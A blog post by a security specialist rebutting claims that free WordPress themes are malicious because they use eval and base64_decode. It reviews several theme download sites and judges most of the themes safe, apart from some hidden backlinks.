This might be a little on the controversial side, but as a security specialist, I believe that too often people are getting “hyped-up” over obfuscated code.
I recently read a blog post titled, “Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else” and while I commend the writer for researching this topic, I also felt compelled to write this rebuttal.
Too often people start reading that hackers are using base64_decode in their infections and then begin searching their sites for this string and become alarmists when they find it.
“Oh no! How did this happen to my site?”
“What do I do now?”
People – it’s used in many, many legitimate ways as well.
Not to discredit the author of the original research, but I did want to provide further details from a security specialists point of view.
I’ll dive into a few of the themes that were listed in the original post.
1. Downloading PRiNZ Branford Magazine theme from WordPressthemesbase.com resulted in a zip file that required a password. Further investigation uncovered this as a possible unauthorized copy of an older version of this theme. While this theme may be harmful to your website, we decided to drop our investigation of this one as you can’t open the downloaded copy from wordpressthemesbase.com anyway.
Result: BAD!!! If you want this theme, get it from http://www.der-prinz.com and pay the $40 – $45 and be done with it.
2. We downloaded the BeautyStore theme from http://www.freewordpressthemes.com and looked at the footer.php which was identified by the original poster as having “severe warnings”. Our deobfuscator showed us this in the footer.php:
Nothing malicious looking there. Appears to be typical footer type code.
Result: Safe. This is an example of not fully decoding or deobfuscating code and assuming it’s bad – this isn’t.
3. We downloaded a number of themes from the site: www.themes2wp.com, however out of 4 downloads, they were all empty. Not sure what was going on there.
From the research performed by the original poster, you can remove the links and have a nice theme. You can’t assume that code using an eval statement is bad. It’s used millions of times in legitimate code.
4. I’ll agree with the original poster on the them downloaded from FreeWPThemes – they should be updated to conform with the WordPress 3.0 standards.
Result: I’d look for other themes that have been updated.
5. Obviously getting free WordPress themes from WordPress.org is going to be your safest option of them all.
Result: Go ahead and do it.
6. The FUNDA theme from themes.rock-kitty.net was downloaded and analyzed next.
In the original poster’s review of this theme, a number of eval(base64_decode strings were identified.
The first one we looked at was in the file: functions.php. It starts out:
This decoded to:
Again – safe.
Analyzing the other base64_decode strings in the functions.php file showed they were harmless as well. I will admit that there are links to various websites embedded in the base64_decodings, but they are harmless. If I were to make a suggestion to the people running the website we downloaded this theme from, it would be to stop using popular themes to build their backlinks.
The website: themes.rock-kitty.net is registered to: Artem Minaev. One of the links embedded in the base64_decode string is: bestincellphones.com, which is a private domain registration so we don’t know who it belongs to, but someone at themes.rock-kitty.net is getting something out of embedding links. We downloaded the FUNDA theme from www.newwpthemes.com and found it did not have any of the links or base64_decode in it so we can only conclude that it was embedded at Rock-kitty.
Result: While maybe sneaky, the theme downloaded from Rock-kitty is safe, although I would download it from newwpthemes.com instead.
Closing: I’m not going to bore you with the details of the other themes. The point here is that you can’t just assume that since a theme, a widget or a plugin is using base64_decode, that it’s bad or malicious.
I do give an “up-top”, as my wife would say, to the original poster for the research, but I would declare many of the themes safe.
If there’s a theme you want analyzed by us, send me an email or post a comment here with the website link and we’ll download it, analyze it and report on it. If this becomes a real popular topic, we’ll create a free analyzer and post it on our website.
Thank you for reading this far. Let’s be safe out there, but not make false accusations of harmless themes.